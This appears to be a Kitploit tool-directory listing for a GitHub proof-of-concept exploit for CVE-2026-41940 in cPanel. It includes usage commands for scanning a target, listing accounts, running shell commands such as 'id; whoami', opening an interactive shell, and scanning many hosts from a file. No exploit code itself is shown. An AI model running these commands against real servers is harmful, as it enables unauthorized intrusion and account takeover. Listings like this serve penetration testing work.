Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
POC_CVE-2026-41940 — Proof-of-concept exploit for CVE-2026-41940 targeting cPanel, enabling account enumeration, command execution, and interactive shell access on vulnerable hosts. | Kitploit
Tools/GitHubGitHub/imbas007/poc_cve-2026-41940
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubimbas007/poc_cve-2026-41940

POC_CVE-2026-41940

Proof-of-concept exploit for CVE-2026-41940 targeting cPanel, enabling account enumeration, command execution, and interactive shell access on vulnerable hosts.

View Repository
3 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

POC_CVE-2026-41940

Quick start

root@kitploit:~
python3 poc_CVE-2026-41940.py -h

Usage examples

Scan one host

root@kitploit:~
python3 poc_CVE-2026-41940.py -u https://target.example:2086

List accounts after successful chain

root@kitploit:~
python3 poc_CVE-2026-41940.py -u https://target.example:2086 --action list

Run a shell command

root@kitploit:~
python3 poc_CVE-2026-41940.py -u https://target.example:2086 --action cmd --cmd 'id; whoami; uname -a'

Interactive shell

root@kitploit:~
python3 poc_CVE-2026-41940.py -u https://target.example:2086 --action shell

Targets from file + JSON report

root@kitploit:~
python3 poc_CVE-2026-41940.py -l targets.txt -t 20 -o results.json

ref : ynsmroztas

Download Tool